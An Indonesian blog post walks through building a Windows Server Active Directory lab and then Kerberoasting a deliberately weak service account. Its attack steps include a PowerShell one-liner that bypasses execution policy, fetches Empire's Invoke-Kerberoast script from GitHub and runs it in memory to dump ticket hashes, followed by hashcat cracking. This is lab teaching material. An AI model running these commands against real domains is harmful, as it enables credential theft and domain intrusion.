Build AD Server with Kerberos dan Attacking Kerberos

Tegar Purnama
MII Cyber Security Consulting Services
5 min readJun 13, 2020

Dalam tulisan ini saya akan menjelaskan bagaimana membangun server dengan Active Directory(AD) lalu kita melakukan serangan melalui kerberos, kerberos adalah jenis protokol authentikasi.

Tahap pertama adalah membangun server di vmware, yaitu sebagai berikut :

  1. Download dulu windows server 2016 nya https://www.microsoft.com/en-us/evalcenter/evaluate-windows-server-2016
isi sembarang aja

2. Setelah download iso selesai, instal di vmware

jika minta lisensi, abaikan saja, tapi jika punya lisensi maka akan lebih bagus lagi

3. Tambah ram dari 2gb menjadi lebih besar, minimal 3gb, lalu hapus floppy disk karena ini akan mempengaruhi proses booting.

4. Klik desktop experience

Next Sampai Finish

Setelah membangun server di vmware, tahap selanjutnya adalah mengaktifkan atau instalasi service Active Directory(AD) di dalam server tersebut, tahapanya sebagai berikut :

  1. Buka powershell sebagai administrator lalu ketik ServerManager.exe

2. Add role and feature, lalu next-next aja terus

3. Pada tahapan ini klik active directory domain service

4. Pada tahapan feature package klik seperti gambar dibawah

5. Klik next trus lalu klik install

6. Lalu klik promote this server to domain controler

Setelah instalasi AD berhasil, selanjutnya adalah menconfigurasi AD tersebut, langkah dalam konfigurasi AD adalah sebagai berikut :

  1. Pertama buka active directory configuration wizard, disini saya akan membuat new forest, bikin nama sendiri, disini saya membuat kerberos.mii

2. Next lalu masukin password, disini saya bikin Palemban666

3. Next pada di DNS options karena ini forest pertama, jadi gak perlu ada perubahan pada DNS, di next aja.

4. Pada nama netbios disini saya buat dengan nama “kerberos”

5. Di halaman selanjutnya dimana lokasi database, sysvol, log disinimpan, biarkan default saja, lalu next.

6. Setelah itu tinggal mereview hasil dari konfigurasi kita, jika sudah benar, tinggal klik next, jika belum boleh previous.

7. Setelah semua siap dan benar, maka akan muncul tanda “install” yg artinya configurasi yang kita buat tadi dapat diinstall.

8. Setelah install restart server vmware kita. Login kembali ke server lalu check apakah AD ini sudah ada(active) ata belum, buka powershell lalu ketikan dsac.exe untuk membuka AD administrasi center.

9. Ketikan perintah Get-ADDomain | fl Name,DomainMode dan Get-ADForest | fl Name,ForestMode di powershell untuk memastikan apakah AD kita tadi sudah berjalan atau belum

dapat dilihat pada gambar diatas domain name adalah kerberos dan forest adalah kerberos.mii sesuai yang kita buat tadi, yang berarti configurasi AD kita sudah benar.

Untuk latihan maka kita membuat 1 user SPN (Service Principal Name) lalu memasukan password nya kedalam wordlist agar bisa ditebak oleh tools brute,karena ini sebagai latihan saja. Tahapan pembuatan user SPN sebagai berikut :

  1. Ketik dsa.msc pada pencarian windows, ini guna untuk menjalankan daftar Active Directory user and computer

2. Lalu create new user pada AD kita tadi (kerberos.mii) buat saja misalnya SQL service

3. Pada password saya masukan password: Palemban6

4. Sekarang membuat user SPN nya, yg kita butuhkan adalah mengetahui nama komputer kita dengan mengetik “echo %computer name%” di command prompt dan “setspn -a namakomputer/servisyangberjalan.domainforest:port domainkerberos\service

5. Pastikan lagi apakah user SPN benar2 sudah terbuat dengan perintah “setspn -T forest -Q */* ”

Oke setelah tahapan ini maka kita sudah berhasil membuat server, Active Directory, dan user SPN, dan target siap di exploit.

Selanjutnya kita akan mengeksploitasi yang kita buat tadi, tapi kita butuh hak akses untuk mengakses powershell server target. Tahapan eksploitasinya sebagai berikut

1. Buka powershell

2. Lalu ketikan ini di cmd atau powershell “powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat

perintah ini berfungsi mendownload suatu file dari powershell yang dimana file ini berguna untuk mengeluarkan output berupa hash dari kerberos, dan outputnya berformat hashcat

3. Copy hashnya saja, yang dimana hash tersebut untuk kita crack menggunakan hashcat, jadikan 1 baris seperti ini

4. Install hashcat di komputer kamu lalu ketikan perintah ini “hashcat -m 13100 pass.txt wl.txt” yang dimana -m 13100 adalah kode untuk melakukan brute terhadap hash tipe kerberos dan pass.txt adalah hash yang kita dapat dari hasil hash powershell tadi, dan wl.txt adalah wordlist.

karena bruteforce ini menggunakan proses GPU dan vga saya tidak suport untuk melakukan bruteforcing, disini saya menggunakan vga rx570 8gb maka saya meminta teman saya untuk melakukan ini.

reff : https://medium.com/@markmotig/kerberoasting-from-setup-to-cracking-3e8c980f26e8

--

--